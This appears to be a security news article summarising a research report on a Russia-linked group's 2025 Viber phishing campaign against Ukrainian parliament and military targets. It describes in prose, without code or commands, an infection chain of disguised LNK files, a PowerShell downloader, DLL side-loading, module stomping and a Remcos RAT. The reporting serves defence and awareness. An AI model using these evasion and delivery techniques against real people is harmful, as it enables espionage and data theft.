Russia-linked APT UAC-0184 targets Ukrainian military and government bodies via Viber, delivering malicious ZIP files for espionage in 2025.
Russia-linked threat actor UAC-0184 (aka Hive0156) is targeting Ukrainian military and government entities, using Viber messages to deliver malicious ZIP files as part of ongoing intelligence-gathering operations in 2025.
“Recent monitoring data from the 360 Advanced Threat Research Institute shows that the UAC-0184 group launched a phishing attack campaign against the Verkhovna Rada (Ukrainian parliament), targeting sensitive issues such as the alteration of Ukrainian military personnel files and the refusal to pay compensation for those killed in action.” reads the report published by the 360 Advanced Threat Research Institute.
The 360 Advanced Threat Research Institute observed UAC-0184 launching a phishing campaign against Ukraine’s Verkhovna Rada. The APT group exploited sensitive themes such as military personnel record changes and denied compensation for fallen soldiers. The group is expected to continue intensive intelligence-theft operations against Ukrainian military and government bodies through 2025, prompting recommendations to strengthen security awareness, encryption, and access controls.
The attack campaign leveraged Viber as the initial access vector, sending malicious ZIP archives (A2393.zip) disguised as official Ukrainian parliamentary documents.
Once extracted, victims were presented with deceptive LNK shortcuts posing as DOCX, RTF, and XLSX files related to inquiries from the Verkhovna Rada (Ukrainian parliament) and military casualty data.
When opened, the files started a multi-step infection process designed to avoid detection. A PowerShell script downloaded more malicious files, used a legitimate program (CFlux.exe) to secretly load malware, and showed fake documents to distract the victim, eventually installing HijackLoader and the Remcos RAT.
UAC-0184 uses two main first-stage infection methods: malicious LNK files and PowerShell scripts. Both display decoy documents while covertly executing the HijackLoader chain, but differ in delivery. LNK attacks require two C2 requests to fetch the decoy and the malicious ZIP, while PowerShell attacks use a single request that delivers both. In the observed case, the LNK file launched a PowerShell script that downloaded and unpacked smoothieks.zip, executed the legitimate CFlux.exe, and opened a decoy document. CFlux.exe side-loaded a malicious DLL that used non-standard control flow to evade analysis by jumping directly into SQLite.Interop.dll. The malware decrypted embedded data, used module stomping to replace code in legitimate DLLs, and injected shellcode into memory. It reconstructed the final payload from encrypted data hidden in PNG structures, ultimately deploying HijackLoader with configuration details for further stages.
HijackLoader injects the Remcos RAT into the legitimate Chime.exe process, allowing attackers to remotely control the system, steal data, execute commands, and receive instructions from a C2 server.
The attribution analysis strongly links the campaign to UAC-0184. The decoy file names and content reference inquiries from the Verkhovna Rada and sensitive issues such as manipulation of military personnel records and denied pensions, aligning with the group’s long-standing focus on Ukrainian government and military intelligence. The use of Viber to deliver malicious archives reflects UAC-0184’s established tactic of exploiting popular messaging platforms in Ukraine, consistent with its past abuse of Signal, Telegram, and other apps, as well as its use of LNK files themed around official investigations and legal requests. Technically, the deployment of HijackLoader to deliver the Remcos RAT matches a known and distinctive toolchain associated with the group. Taken together—target selection, social engineering themes, delivery method, and malware stack—the evidence indicates with high confidence that the operation was conducted by UAC-0184.
“Based on the above, including victim identification, social engineering techniques, and the characteristics of the specialized toolset, there is a high degree of confidence that this attack was caused by the UAC-0184 organization.” concludes the report.
Follow me on Twitter: @securityaffairs and Facebook and Mastodon
(SecurityAffairs – hacking, Ukraine)
